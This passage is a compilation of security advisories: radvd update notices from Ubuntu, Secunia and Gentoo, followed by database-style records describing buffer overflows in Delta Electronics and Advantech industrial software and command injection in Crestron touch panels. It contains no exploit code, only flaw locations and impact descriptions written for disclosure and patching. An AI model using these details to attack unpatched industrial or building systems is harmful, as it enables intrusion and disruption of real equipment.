service. (CVE-2011-3605)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 11.10:
radvd 1:1.8-1ubuntu0.1
Ubuntu 11.04:
radvd 1:1.7-1ubuntu0.1
Ubuntu 10.10:
radvd 1:1.6-1ubuntu0.1
Ubuntu 10.04 LTS:
radvd 1:1.3-1.1ubuntu0.1
In general, a standard system update will make all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-1257-1
CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605
Package Information:
https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1
https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1
https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1
https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1
. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach?
Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM:
http://secunia.com/products/corporate/vim/ovum_2011_request/
----------------------------------------------------------------------
TITLE:
Fedora update for radvd
SECUNIA ADVISORY ID:
SA46626
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/46626/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=46626
RELEASE DATE:
2011-10-29
DISCUSS ADVISORY:
http://secunia.com/advisories/46626/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/46626/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46626
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Fedora has issued an update for radvd.
For more information:
SA46200
SOLUTION:
Apply updated packages via the yum utility ("yum update radvd").
ORIGINAL ADVISORY:
FEDORA-2011-14000:
http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068481.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201111-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: radvd: Multiple vulnerabilities
Date: November 20, 2011
Bugs: #385967
ID: 201111-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in radvd which could
potentially lead to privilege escalation, data loss, or a Denial of
Service.
Background
==========
radvd is an IPv6 router advertisement daemon for Linux and BSD.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/radvd < 1.8.2 >= 1.8.2
Description
===========
Multiple vulnerabilities have been discovered in radvd. Please review
the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All radvd users should upgrade to the latest stable version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2"
References
==========
[ 1 ] CVE-2011-3601
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601
[ 2 ] CVE-2011-3602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602
[ 3 ] CVE-2011-3603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603
[ 4 ] CVE-2011-3604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604
[ 5 ] CVE-2011-3605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201111-08.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
|
|
var-201702-0423
|
An issue was discovered in Delta Electronics WPLSoft, Versions prior to V2.42.11, ISPSoft, Versions prior to 3.02.11, and PMSoft, Versions prior to2.10.10. There are multiple instances of heap-based buffer overflows that may allow malicious files to cause the execution of arbitrary code or a denial of service. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation WPLSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of bit memory from a DVB file. A crafted length element can trigger an overflow of a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Delta Electronics WPLSoft and others are software control platforms used by Delta Electronics to edit the Delta DVP series of programmable logic controllers (PLCs). A heap buffer overflow vulnerability exists in several Delta Electronics products |
|
var-201810-0396
|
Advantech WebAccess 8.3.1 and earlier has several stack-based buffer overflow vulnerabilities that have been identified, which may allow an attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability.The specific flaw exists within BwCLRptw.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech (Advantech) WebAccess software is the core of Advantech's IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. A stack buffer overflow vulnerability exists in Advantech WebAccess. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment |
|
var-201806-1058
|
Crestron TSW-1060, TSW-760, TSW-560, TSW-1060-NC, TSW-760-NC, and TSW-560-NC devices before 2.001.0037.001 allow unauthenticated remote code execution via a Bash shell service in Crestron Toolbox Protocol (CTP). plural Crestron Device and code injection vulnerabilities exist.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Crestron's Android-based products. Authentication is required to exploit this vulnerability.The specific flaw exists within the ADDUSER command of the CTP console. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker could leverage this vulnerability to execute code with root privileges. CrestronTSW-1060 and other are touch screen devices of Crestron Electronics of the United States. There are security vulnerabilities in several Crestron products. Multiple OS command-injection vulnerabilities.
2. An access-bypass vulnerability.
3. A security-bypass vulnerability.
Attackers can exploit these issues to execute arbitrary OS commands and bypass certain security restrictions, perform unauthorized actions, or gain sensitive information within the context of the affected system. Failed exploit attempts will likely result in denial of service conditions |